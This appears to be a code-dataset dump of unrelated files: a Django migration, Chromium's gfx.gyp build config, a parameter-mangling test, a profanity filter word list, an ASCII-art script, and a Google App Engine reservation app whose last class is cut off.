] | null | null | null | travel/migrations/0029_auto_20190514_2108.py | sausage-team/travel-notes | 3c2454ebad7764906c5ff30cbdfe296cb7c64eb4 | [
"MIT"
] | null | null | null | travel/migrations/0029_auto_20190514_2108.py | sausage-team/travel-notes | 3c2454ebad7764906c5ff30cbdfe296cb7c64eb4 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.1 on 2019-05-14 13:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('travel', '0028_auto_20190514_1929'),
]
operations = [
migrations.AlterField(
model_name='user',
name='uid',
field=models.CharField(default='b8554d6d-264a-4ce7-bd9b-a2e1e218a13d', max_length=40),
),
]
| 22.526316 | 98 | 0.616822 | 48 | 428 | 5.395833 | 0.854167 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161392 | 0.261682 | 428 | 18 | 99 | 23.777778 | 0.658228 | 0.10514 | 0 | 0 | 1 | 0 | 0.188976 | 0.154856 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce9550e5fc7912aecc7ac103430d2e2845e818b7 | 12,566 | gyp | Python | ui/gfx/gfx.gyp | cvsuser-chromium/chromium | acb8e8e4a7157005f527905b48dd48ddaa3b863a | [
"BSD-3-Clause"
] | 4 | 2017-04-05T01:51:34.000Z | 2018-02-15T03:11:54.000Z | ui/gfx/gfx.gyp | cvsuser-chromium/chromium | acb8e8e4a7157005f527905b48dd48ddaa3b863a | [
"BSD-3-Clause"
] | 1 | 2021-12-13T19:44:12.000Z | 2021-12-13T19:44:12.000Z | ui/gfx/gfx.gyp | cvsuser-chromium/chromium | acb8e8e4a7157005f527905b48dd48ddaa3b863a | [
"BSD-3-Clause"
] | 4 | 2017-04-05T01:52:03.000Z | 2022-02-13T17:58:45.000Z | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'targets': [
{
'target_name': 'gfx',
'type': '<(component)',
'dependencies': [
'<(DEPTH)/base/base.gyp:base',
'<(DEPTH)/base/base.gyp:base_i18n',
'<(DEPTH)/base/base.gyp:base_static',
'<(DEPTH)/base/third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
'<(DEPTH)/net/net.gyp:net',
'<(DEPTH)/skia/skia.gyp:skia',
'<(DEPTH)/third_party/icu/icu.gyp:icui18n',
'<(DEPTH)/third_party/icu/icu.gyp:icuuc',
'<(DEPTH)/third_party/libpng/libpng.gyp:libpng',
'<(DEPTH)/third_party/zlib/zlib.gyp:zlib',
'<(DEPTH)/url/url.gyp:url_lib',
],
# text_elider.h includes ICU headers.
'export_dependent_settings': [
'<(DEPTH)/skia/skia.gyp:skia',
'<(DEPTH)/third_party/icu/icu.gyp:icui18n',
'<(DEPTH)/third_party/icu/icu.gyp:icuuc',
],
'defines': [
'GFX_IMPLEMENTATION',
],
'sources': [
'android/device_display_info.cc',
'android/device_display_info.h',
'android/gfx_jni_registrar.cc',
'android/gfx_jni_registrar.h',
'android/java_bitmap.cc',
'android/java_bitmap.h',
'android/shared_device_display_info.cc',
'android/shared_device_display_info.h',
'animation/animation.cc',
'animation/animation.h',
'animation/animation_container.cc',
'animation/animation_container.h',
'animation/animation_container_element.h',
'animation/animation_container_observer.h',
'animation/animation_delegate.h',
'animation/linear_animation.cc',
'animation/linear_animation.h',
'animation/multi_animation.cc',
'animation/multi_animation.h',
'animation/slide_animation.cc',
'animation/slide_animation.h',
'animation/throb_animation.cc',
'animation/throb_animation.h',
'animation/tween.cc',
'animation/tween.h',
'blit.cc',
'blit.h',
'box_f.cc',
'box_f.h',
'break_list.h',
'canvas.cc',
'canvas.h',
'canvas_android.cc',
'canvas_paint_gtk.cc',
'canvas_paint_gtk.h',
'canvas_paint_mac.h',
'canvas_paint_mac.mm',
'canvas_paint_win.cc',
'canvas_paint_win.h',
'canvas_skia.cc',
'canvas_skia_paint.h',
'codec/jpeg_codec.cc',
'codec/jpeg_codec.h',
'codec/png_codec.cc',
'codec/png_codec.h',
'color_analysis.cc',
'color_analysis.h',
'color_profile.cc',
'color_profile.h',
'color_profile_mac.cc',
'color_profile_win.cc',
'color_utils.cc',
'color_utils.h',
'display.cc',
'display.h',
'display_observer.cc',
'display_observer.h',
'favicon_size.cc',
'favicon_size.h',
'frame_time.h',
'font.cc',
'font.h',
'font_fallback_win.cc',
'font_fallback_win.h',
'font_list.cc',
'font_list.h',
'font_render_params_android.cc',
'font_render_params_linux.cc',
'font_render_params_linux.h',
'font_smoothing_win.cc',
'font_smoothing_win.h',
'gfx_export.h',
'gfx_paths.cc',
'gfx_paths.h',
'gpu_memory_buffer.cc',
'gpu_memory_buffer.h',
'image/canvas_image_source.cc',
'image/canvas_image_source.h',
'image/image.cc',
'image/image.h',
'image/image_family.cc',
'image/image_family.h',
'image/image_ios.mm',
'image/image_mac.mm',
'image/image_png_rep.cc',
'image/image_png_rep.h',
'image/image_skia.cc',
'image/image_skia.h',
'image/image_skia_operations.cc',
'image/image_skia_operations.h',
'image/image_skia_rep.cc',
'image/image_skia_rep.h',
'image/image_skia_source.h',
'image/image_skia_util_ios.h',
'image/image_skia_util_ios.mm',
'image/image_skia_util_mac.h',
'image/image_skia_util_mac.mm',
'image/image_util.cc',
'image/image_util.h',
'image/image_util_ios.mm',
'insets.cc',
'insets.h',
'insets_base.h',
'insets_f.cc',
'insets_f.h',
'interpolated_transform.cc',
'interpolated_transform.h',
'mac/scoped_ns_disable_screen_updates.h',
'matrix3_f.cc',
'matrix3_f.h',
'native_widget_types.h',
'ozone/dri/dri_skbitmap.cc',
'ozone/dri/dri_skbitmap.h',
'ozone/dri/dri_surface.cc',
'ozone/dri/dri_surface.h',
'ozone/dri/dri_surface_factory.cc',
'ozone/dri/dri_surface_factory.h',
'ozone/dri/dri_wrapper.cc',
'ozone/dri/dri_wrapper.h',
'ozone/dri/hardware_display_controller.cc',
'ozone/dri/hardware_display_controller.h',
'ozone/impl/file_surface_factory.cc',
'ozone/impl/file_surface_factory.h',
'ozone/surface_factory_ozone.cc',
'ozone/surface_factory_ozone.h',
'pango_util.cc',
'pango_util.h',
'path.cc',
'path.h',
'path_aura.cc',
'path_gtk.cc',
'path_win.cc',
'path_win.h',
'path_x11.cc',
'path_x11.h',
'platform_font.h',
'platform_font_android.cc',
'platform_font_ios.h',
'platform_font_ios.mm',
'platform_font_mac.h',
'platform_font_mac.mm',
'platform_font_ozone.cc',
'platform_font_pango.cc',
'platform_font_pango.h',
'platform_font_win.cc',
'platform_font_win.h',
'point.cc',
'point.h',
'point3_f.cc',
'point3_f.h',
'point_base.h',
'point_conversions.cc',
'point_conversions.h',
'point_f.cc',
'point_f.h',
'quad_f.cc',
'quad_f.h',
'range/range.cc',
'range/range.h',
'range/range_mac.mm',
'range/range_win.cc',
'rect.cc',
'rect.h',
'rect_base.h',
'rect_base_impl.h',
'rect_conversions.cc',
'rect_conversions.h',
'rect_f.cc',
'rect_f.h',
'render_text.cc',
'render_text.h',
'render_text_mac.cc',
'render_text_mac.h',
'render_text_ozone.cc',
'render_text_pango.cc',
'render_text_pango.h',
'render_text_win.cc',
'render_text_win.h',
'safe_integer_conversions.h',
'scoped_canvas.h',
'scoped_cg_context_save_gstate_mac.h',
'scoped_ns_graphics_context_save_gstate_mac.h',
'scoped_ns_graphics_context_save_gstate_mac.mm',
'scoped_ui_graphics_push_context_ios.h',
'scoped_ui_graphics_push_context_ios.mm',
'screen.cc',
'screen.h',
'screen_android.cc',
'screen_aura.cc',
'screen_gtk.cc',
'screen_ios.mm',
'screen_mac.mm',
'screen_win.cc',
'screen_win.h',
'scrollbar_size.cc',
'scrollbar_size.h',
'selection_model.cc',
'selection_model.h',
'sequential_id_generator.cc',
'sequential_id_generator.h',
'shadow_value.cc',
'shadow_value.h',
'size.cc',
'size.h',
'size_base.h',
'size_conversions.cc',
'size_conversions.h',
'size_f.cc',
'size_f.h',
'skbitmap_operations.cc',
'skbitmap_operations.h',
'skia_util.cc',
'skia_util.h',
'skia_utils_gtk.cc',
'skia_utils_gtk.h',
'switches.cc',
'switches.h',
'sys_color_change_listener.cc',
'sys_color_change_listener.h',
'text_constants.h',
'text_elider.cc',
'text_elider.h',
'text_utils.cc',
'text_utils.h',
'text_utils_android.cc',
'text_utils_ios.mm',
'text_utils_skia.cc',
'transform.cc',
'transform.h',
'transform_util.cc',
'transform_util.h',
'utf16_indexing.cc',
'utf16_indexing.h',
'vector2d.cc',
'vector2d.h',
'vector2d_conversions.cc',
'vector2d_conversions.h',
'vector2d_f.cc',
'vector2d_f.h',
'vector3d_f.cc',
'vector3d_f.h',
'win/dpi.cc',
'win/dpi.h',
'win/hwnd_util.cc',
'win/hwnd_util.h',
'win/scoped_set_map_mode.h',
'win/singleton_hwnd.cc',
'win/singleton_hwnd.h',
'win/window_impl.cc',
'win/window_impl.h',
'x/x11_atom_cache.cc',
'x/x11_atom_cache.h',
'x/x11_types.cc',
'x/x11_types.h',
],
'conditions': [
['OS=="ios"', {
# iOS only uses a subset of UI.
'sources/': [
['exclude', '^codec/jpeg_codec\\.cc$'],
],
}, {
'dependencies': [
'<(libjpeg_gyp_path):libjpeg',
],
}],
# TODO(asvitkine): Switch all platforms to use canvas_skia.cc.
# http://crbug.com/105550
['use_canvas_skia==1', {
'sources!': [
'canvas_android.cc',
],
}, { # use_canvas_skia!=1
'sources!': [
'canvas_skia.cc',
],
}],
['toolkit_uses_gtk == 1', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:gtk',
],
'sources': [
'gtk_native_view_id_manager.cc',
'gtk_native_view_id_manager.h',
'gtk_preserve_window.cc',
'gtk_preserve_window.h',
'gdk_compat.h',
'gtk_compat.h',
'gtk_util.cc',
'gtk_util.h',
'image/cairo_cached_surface.cc',
'image/cairo_cached_surface.h',
'scoped_gobject.h',
],
}],
['OS=="win"', {
'sources': [
'gdi_util.cc',
'gdi_util.h',
'icon_util.cc',
'icon_util.h',
],
# TODO(jschuh): C4267: http://crbug.com/167187 size_t -> int
# C4324 is structure was padded due to __declspec(align()), which is
# uninteresting.
'msvs_disabled_warnings': [ 4267, 4324 ],
}],
['OS=="android"', {
'sources!': [
'animation/throb_animation.cc',
'display_observer.cc',
'path.cc',
'selection_model.cc',
],
'dependencies': [
'gfx_jni_headers',
],
'link_settings': {
'libraries': [
'-landroid',
'-ljnigraphics',
],
},
}],
['OS=="android" and android_webview_build==0', {
'dependencies': [
'<(DEPTH)/base/base.gyp:base_java',
],
}],
['OS=="android" or OS=="ios"', {
'sources!': [
'render_text.cc',
'render_text.h',
'text_utils_skia.cc',
],
}],
['use_pango==1', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:pangocairo',
],
}],
['ozone_platform_dri==1', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:dridrm',
],
}],
],
'target_conditions': [
# Need 'target_conditions' to override default filename_rules to include
# the file on iOS.
['OS == "ios"', {
'sources/': [
['include', '^scoped_cg_context_save_gstate_mac\\.h$'],
],
}],
],
}
],
'conditions': [
['OS=="android"' , {
'targets': [
{
'target_name': 'gfx_jni_headers',
'type': 'none',
'direct_dependent_settings': {
'include_dirs': [
'<(SHARED_INTERMEDIATE_DIR)/ui/gfx',
],
},
'sources': [
'../android/java/src/org/chromium/ui/gfx/BitmapHelper.java',
'../android/java/src/org/chromium/ui/gfx/DeviceDisplayInfo.java',
],
'variables': {
'jni_gen_package': 'ui/gfx',
'jni_generator_ptr_type': 'long',
},
'includes': [ '../../build/jni_generator.gypi' ],
},
],
}],
],
}
| 29.990453 | 100 | 0.524988 | 1,392 | 12,566 | 4.427443 | 0.193966 | 0.035697 | 0.019633 | 0.017037 | 0.201038 | 0.118449 | 0.074963 | 0.041214 | 0.041214 | 0.041214 | 0 | 0.008554 | 0.320866 | 12,566 | 418 | 101 | 30.062201 | 0.713616 | 0.045758 | 0 | 0.222222 | 0 | 0 | 0.565584 | 0.293479 | 0 | 0 | 0 | 0.002392 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ceac7c7a86d7f596354c9e7181c0d362a2bc878a | 1,478 | py | Python | tests/test_mangling.py | ecoinvent/brightway2-parameters | 0b42466bf33655087e231364a7d677c6c114a046 | [
"BSD-3-Clause"
] | null | null | null | tests/test_mangling.py | ecoinvent/brightway2-parameters | 0b42466bf33655087e231364a7d677c6c114a046 | [
"BSD-3-Clause"
] | 1 | 2019-12-26T15:18:49.000Z | 2019-12-26T15:18:49.000Z | tests/test_mangling.py | ecoinvent/brightway2-parameters | 0b42466bf33655087e231364a7d677c6c114a046 | [
"BSD-3-Clause"
] | 1 | 2021-07-05T12:14:49.000Z | 2021-07-05T12:14:49.000Z | from bw2parameters import *
def test_mangle_formula():
given = "log(foo * bar) + 7 / baz"
prefix = "pre"
assert mangle_formula(given, prefix, ['bar']) == '(log((pre__foo * bar)) + (7 / pre__baz))'
def test_prefix_parameter_dict():
given = {
'a': {'formula': 'a + b / c', 'foo': True},
'b': {'formula': '2 * a - exp(7 - b)'},
'catch': {}
}
expected = {
't_a': {'formula': '(t_a + (t_b / c))', 'foo': True, 'original': 'a'},
't_b': {'formula': '((2 * t_a) - exp((7 - t_b)))', 'original': 'b'},
't_catch': {'original': 'catch'}
}
substitutions = {'a': 't_a', 'b': 't_b', 'catch': 't_catch'}
assert prefix_parameter_dict(given, "t_") == (expected, substitutions)
def test_chain_prefix_parameter_dict():
given = {'a': {'formula': 'a + b / c'}}
g_copy = {'a': {'formula': 'a + b / c'}}
expected = {
't_a': {'formula': '(t_a + (b / c))', 'original': 'a'},
}
substitutions = {'a': 't_a'}
assert prefix_parameter_dict(given, "t_") == (expected, substitutions)
assert given == g_copy
given, _ = prefix_parameter_dict(given, "t_")
s1 = {'b': 'dog'}
r1 = substitute_in_formulas(given, s1)
expected = {'t_a': {'formula': '(t_a + (dog / c))', 'original': 'a'}}
assert r1 == expected
s2 = {'c': 'cat'}
r2 = substitute_in_formulas(r1, s2)
expected = {'t_a': {'formula': '(t_a + (dog / cat))', 'original': 'a'}}
assert r2 == expected
| 35.190476 | 95 | 0.525034 | 191 | 1,478 | 3.816754 | 0.21466 | 0.030178 | 0.130316 | 0.164609 | 0.400549 | 0.351166 | 0.29904 | 0.238683 | 0.096022 | 0 | 0 | 0.014286 | 0.242219 | 1,478 | 41 | 96 | 36.04878 | 0.636607 | 0 | 0 | 0.111111 | 0 | 0 | 0.275372 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.083333 | false | 0 | 0.027778 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ceb07de7a23c054666d87af2b849db00c172593e | 819 | py | Python | Config/Texts/NFSW/NFSW.py | amiralirj/DarkHelper | 386eea58eb6b9766d6f900a83f87eeac0b8f09c2 | [
"MIT"
] | 34 | 2021-08-05T12:41:18.000Z | 2021-11-30T22:23:20.000Z | Config/Texts/NFSW/NFSW.py | amiralirj/DarkHelper | 386eea58eb6b9766d6f900a83f87eeac0b8f09c2 | [
"MIT"
] | 2 | 2021-08-29T10:32:02.000Z | 2021-08-31T12:10:29.000Z | Config/Texts/NFSW/NFSW.py | amiralirj/DarkHelper | 386eea58eb6b9766d6f900a83f87eeac0b8f09c2 | [
"MIT"
] | 5 | 2021-08-07T07:41:44.000Z | 2021-08-20T13:52:36.000Z | NFSW_Texts = [
'سکس'
,'گایید'
,' کص'
,'جنده'
,'کیر'
,'jnde'
,'jende'
,'kos'
,'pussy'
,'kir'
,'lashi'
,'لاشی'
,'jakesh'
,'جاکش'
,'مادر خراب'
,'madar kharab'
,'mde kharab'
,'khar kose'
,'fuck'
,'bitch'
,'haroomzade'
,'حرومی'
,'حرامزاده'
,'حرومزاده'
,'جندس'
,'کصه '
]
NFSW_Names=[
'خاله'
,'جنده'
,"کص"
,"کیر"
,"ساعتی"
,"اوف"
,"💦💦💦💦"
,"سوپر"
,"فیلم"
,"بیو"
,"حضوری"
,"مکان"
]
Porn={'dick':'Male Genitalia - Exposed',
'pussy':'Female Genitalia - Exposed',
'coveredpossy':'Female Genitalia - Covered',
'fboobs':'Female Breast - Exposed',
'mboobs':'Male Breast - Exposed',
'coveredboobs':'Female Breast - Covered',
'stomack':'Male Breast - Covered',
'baghal':'Male Breast - Exposed',
'ass':'Buttocks - Exposed',
'feet':'404NotFound',
'coveredass':'Buttocks - Covered'} | 14.625 | 45 | 0.577534 | 87 | 819 | 5.45977 | 0.689655 | 0.082105 | 0.071579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004458 | 0.178266 | 819 | 56 | 46 | 14.625 | 0.695394 | 0 | 0 | 0.037736 | 0 | 0 | 0.649673 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cec69b53aae0a98c800aee68729ab0b6f22dfd50 | 1,976 | py | Python | cli/asciiart.py | Christophe1997/pyramid | d135c86329b6527d54535d95c0db8b5d2da6cc8c | [
"Apache-2.0"
] | null | null | null | cli/asciiart.py | Christophe1997/pyramid | d135c86329b6527d54535d95c0db8b5d2da6cc8c | [
"Apache-2.0"
] | null | null | null | cli/asciiart.py | Christophe1997/pyramid | d135c86329b6527d54535d95c0db8b5d2da6cc8c | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/env python3
"""Convert picture to asciiArt, requrie python3.6 or higher.
Dependence:
- fire
- PIL
- numpy
Usage:
- chmod +x asciiart.py
- asciiart.py ${path_to_image} [Height] [Width]
Also, you can remove the filetype ".py" and put it to $HOME/bin/ then enjoy it:)
One example:
*&&&&&&&&&&&&&&&&&&&&&+
&&&$ &&&&&&&&&&&&&&&&&%
&&&&&%&&&&&&&&&&&&&&&&&&&$
%%%%%%%%%%%%%&&&&&&&&$$$$$
+&&&&&&&&&&&&&&&&&&&&&&&$&&&$$$$$$$$ ****** ***
&&&&&&&&&&&&&&&&&&&&&&&&&&&&$$$$$$$$$$*************
&&&&&&&&&&&&&&&&&&&&&&&&&&&$$$$$$$$$&$%*************
*&&&&&&&&&&&&&&&&&&&&&&&&&&$$$$$$$$$# ****************
+&&&&&&&&&&&&&$%**************************************
&&&&&&&&&&&&** **************************************
*&&&&&&&&&&$ ***************************************
+&&&&&&&&$ *************************************
**************************
**************************
****************** ****
+********************+
"""
import fire
from PIL import Image
import numpy as np
import sys
class AsciiArt:
DEFAULT_HEIGHT = 20
DEFAULT_WIDTH = 60
SYMBOL = list("@#$&%+* ")
def draw(self, image_path, height=DEFAULT_HEIGHT, width=DEFAULT_WIDTH):
try:
image = Image.open(image_path).resize((width, height))
array = np.array(image.convert("L"))
image.close()
except FileNotFoundError:
print(f"{image_path} not exist")
sys.exit(1)
array = np.floor((array / 256) * 8)
result = []
for i, line in enumerate(array):
try:
result.append("".join(map(lambda x: self.SYMBOL[int(x)], line)) + "\n")
except IndexError:
print(i)
sys.exit(1)
return "".join(result)
if __name__ == "__main__":
fire.Fire(AsciiArt)
| 29.058824 | 87 | 0.34666 | 150 | 1,976 | 4.453333 | 0.573333 | 0.040419 | 0.023952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009053 | 0.273279 | 1,976 | 67 | 88 | 29.492537 | 0.456128 | 0.551113 | 0 | 0.148148 | 0 | 0 | 0.046644 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.148148 | 0 | 0.37037 | 0.074074 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cec7fff35f1ea56bf0187cca1f5248b7d68f0fa3 | 14,729 | py | Python | main.py | ceciliazhang12/resource-reservation-system | d680582a41d39b1558b85d1e42f9006eb07caef8 | [
"Apache-2.0"
] | null | null | null | main.py | ceciliazhang12/resource-reservation-system | d680582a41d39b1558b85d1e42f9006eb07caef8 | [
"Apache-2.0"
] | null | null | null | main.py | ceciliazhang12/resource-reservation-system | d680582a41d39b1558b85d1e42f9006eb07caef8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START imports]
import os
from datetime import datetime, time, timedelta
import uuid
import time as t
from google.appengine.api import users
from google.appengine.ext import ndb
from google.appengine.api import mail
import jinja2
import webapp2
from models import Resource, Reservation
from __builtin__ import True
PATH_TEMPLATE = os.path.join(os.path.dirname(__file__), 'templates')
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(PATH_TEMPLATE),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
# [END imports]
# Helper Function
def send_mail(resource, reservation):
text = "Hi,\n\n" + "You've reserved {0} from {1} to {2}. " \
.format(reservation.resource_name, reservation.start_time,
reservation.end_time)
mail.send_mail(sender="yz3847@nyu.edu", to=reservation.user,
subject="Reservation Confirmend.", body=text)
'''
Landing Page, which displays the following 4 sections:
user login / logout link
reservations made for resources by that user (sorted by the reservation time)
all resources in the system (shown in reverse time order based on last made reservation)
resources owned by that user
a link to create a new resource
'''
class LandingPage(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
url = users.create_logout_url(self.request.uri)
url_linktext = 'Logout'
# retrieve reservations by current user
now_time = datetime.now() - timedelta(minutes=300)
reservation_by_curr_user = Reservation.query(ndb.AND(Reservation.user == user.email(),
Reservation.end_time > now_time)) \
.fetch()
if reservation_by_curr_user:
reservation_by_curr_user = sorted(reservation_by_curr_user, key=lambda r: r.start_time)
# retrieve all resources in system
sorted_resources = Resource.query().order(-Resource.last_reservation_time)
# retrieve resources owned by current user
resources_owned = Resource.query(Resource.owner==user.email())
template_values = {
'user': user,
'reservation_by_curr_user': reservation_by_curr_user,
'sorted_resources': sorted_resources,
'resources_owned': resources_owned,
'url': url,
'url_linktext': url_linktext,
}
template = JINJA_ENVIRONMENT.get_template('index.html')
self.response.write(template.render(template_values))
else:
self.redirect(users.create_login_url(self.request.uri))
# url_linktext = 'Login'
'''
CreateResource Handler enables the function of creating a new resource
'''
class CreateResource(webapp2.RequestHandler):
def get(self):
template = JINJA_ENVIRONMENT.get_template('newResource.html')
template_values = {}
self.response.write(template.render(template_values))
def post(self):
resource = Resource()
user = users.get_current_user()
if user:
resource.owner = user.email()
resource.id = str(uuid.uuid4())
resource.name = self.request.get('name')
start_time = map(int, self.request.get('available_start_time').split(':'))
end_time = map(int, self.request.get('available_end_time').split(':'))
resource.available_start_time = datetime.combine(datetime.today(), time(*start_time))
resource.available_end_time = datetime.combine(datetime.today(), time(*end_time))
resource.tags = self.request.get('tags').split(', ')
resource.num_reserved = 0
resource.put()
t.sleep(0.1)
self.redirect('/')
'''
ViewResource Handler handels displaying the main page for an existing resource
'''
class ViewResource(webapp2.RequestHandler):
def get(self):
resource_id = self.request.get('id')
owner = Resource.query(Resource.id == resource_id).get().owner
count = Resource.query(Resource.id == resource_id).get().num_reserved
curr_user = users.get_current_user()
now_time = datetime.now() - timedelta(minutes=300)
reservations = Reservation.query(ndb.AND(Reservation.resource_id == resource_id,
Reservation.end_time >= now_time)).fetch()
reservations = sorted(reservations, key=lambda r: r.start_time)
# currentUser = str(users.get_current_user().email())
template_values = {
'reservations': reservations,
'curr_user': curr_user,
'owner': owner,
'resource_id': resource_id,
'count':count,
}
template = JINJA_ENVIRONMENT.get_template('resource.html')
self.response.write(template.render(template_values))
'''
ViewResource Handler handels the function of editing an existing resource
'''
class EditResource(webapp2.RequestHandler):
def get(self):
resource_id = self.request.get('id')
resource = Resource.query(Resource.id == resource_id).get()
start = resource.available_start_time
end = resource.available_end_time
template_values = {
'id': resource_id,
'name': resource.name,
'available_start_time': start,
'available_end_time': end,
'tags': ', '.join(resource.tags),
}
template = JINJA_ENVIRONMENT.get_template('editResource.html')
self.response.write(template.render(template_values))
def post(self):
resource_id = self.request.get('id')
resource = Resource.query(Resource.id == resource_id).get()
resource.name = self.request.get('name')
# today = datetime.now().date()
start_time = map(int, self.request.get('available_start_time').split(':'))
end_time = map(int, self.request.get('available_end_time').split(':'))
resource.available_start_time = datetime.combine(datetime.today(), time(*start_time))
resource.available_end_time = datetime.combine(datetime.today(), time(*end_time))
resource.tags = self.request.get('tags').split(', ')
resource.put()
t.sleep(0.1)
self.redirect('/')
'''
ViewUser Handler handels displaying the main page for an user
'''
class ViewUser(webapp2.RequestHandler):
def get(self):
user_email = self.request.get('email')
# retrieve user's reservations
reservation_by_curr_user = Reservation.query(Reservation.user == user_email)
if reservation_by_curr_user:
reservation_by_curr_user = reservation_by_curr_user.order(Reservation.start_time)
# retrieve resources owned by this user
resources_owned = Resource.query(Resource.owner==user_email)
template_values = {
'reservation_by_curr_user': reservation_by_curr_user,
'resources_owned': resources_owned,
}
template = JINJA_ENVIRONMENT.get_template('user.html')
self.response.write(template.render(template_values))
'''
CreateResservation Handler enables the function of creating a new reservation
'''
class CreateReservation(webapp2.RequestHandler):
def get(self):
resource_id = self.request.get('id')
resource = Resource.query(Resource.id == resource_id).get()
template_values = {
'id': resource_id,
'name': resource.name
}
template = JINJA_ENVIRONMENT.get_template('newReservation.html')
self.response.write(template.render(template_values))
def post(self):
resource_id = self.request.get('id')
resource_name = self.request.get('name')
start_time = time(*map(int, self.request.get('available_start_time').split(':')))
start_time = datetime.combine(datetime.today(), start_time)
duration = int(self.request.get('duration'))
resource = Resource.query(Resource.id == resource_id).get()
end_time = start_time + timedelta(minutes=duration)
# check time format and availability
has_error = False
msg = ''
# error check
if end_time < start_time:
has_error = True
msg = 'Error, wrong format of start time or duration. Please return to former page to enter correctly.'
elif resource.available_start_time > start_time or \
resource.available_end_time < end_time:
has_error = True
msg = 'Error, resource not available during the selected period. Please return to former page to enter another time period.'
else:
reservations = Reservation.query(Reservation.resource_id == resource_id).fetch()
for r in reservations:
if not (end_time <= r.start_time or start_time >= r.end_time):
has_error = True
msg = 'Error, reservation conflict. Please return to former page to enter another time period.'
if has_error:
template = JINJA_ENVIRONMENT.get_template('newReservation.html')
template_values = {'msg': msg}
self.response.write(template.render(template_values))
else:
# add reservation if no error
reservation = Reservation()
reservation.id = str(uuid.uuid4())
reservation.user = str(users.get_current_user().email())
reservation.start_time = start_time
reservation.duration = duration
reservation.end_time = end_time
reservation.resource_id = resource_id
reservation.resource_name = resource_name
reservation.put()
resource.last_reservation_time = datetime.now() - timedelta(minutes=300)
resource.num_reserved += 1
resource.put()
t.sleep(1)
send_mail(resource, reservation)
self.redirect('/')
'''
CreateResservation Handler enables the function of
generating a RSS link for an existing reservation
'''
class GenerateRSS(webapp2.RequestHandler):
def get(self):
resource_id = self.request.get('id')
resource = Resource.query(Resource.id == resource_id).get()
reservations = Reservation.query(Reservation.resource_id == resource_id).fetch()
header = '<?xml version="1.0" encoding="UTF-8" ?>'
tag_owner = '<owner>{}</owner>'.format(resource.owner)
tag_name = '<name>{}</name>'.format(resource.name)
tag_start = '<start_time>{}</start_time>'.format(resource.available_start_time)
tag_end = '<end_time>{}</end_time>'.format(resource.available_end_time)
tags_reservation = []
for r in reservations:
t = {}
t['user'] = '<reservedBy>{}</reservedBy>'.format(r.user)
t['start'] = '<reservedAt>{}</reservedAt>'.format(r.start_time)
tags_reservation.append(t)
template_values = {
'header': header,
'owner': tag_owner,
'name': tag_name,
'start_time': tag_start,
'end_time': tag_end,
'reservations': tags_reservation,
}
template = JINJA_ENVIRONMENT.get_template('rss.html')
self.response.write(template.render(template_values))
'''
DeleteResservation Handler enables deleting an existing reservation in Landing Page
'''
class DeleteReservation(webapp2.RequestHandler):
def post(self):
reservation_id = self.request.get('reservation_id')
reservation = Reservation.query(Reservation.id == reservation_id).get()
reservation.key.delete()
t.sleep(0.1)
self.redirect('/')
'''
ResourceBy Handler enables the function of filtering existing resources by tag
'''
class ResourcesByTag(webapp2.RequestHandler):
def get(self):
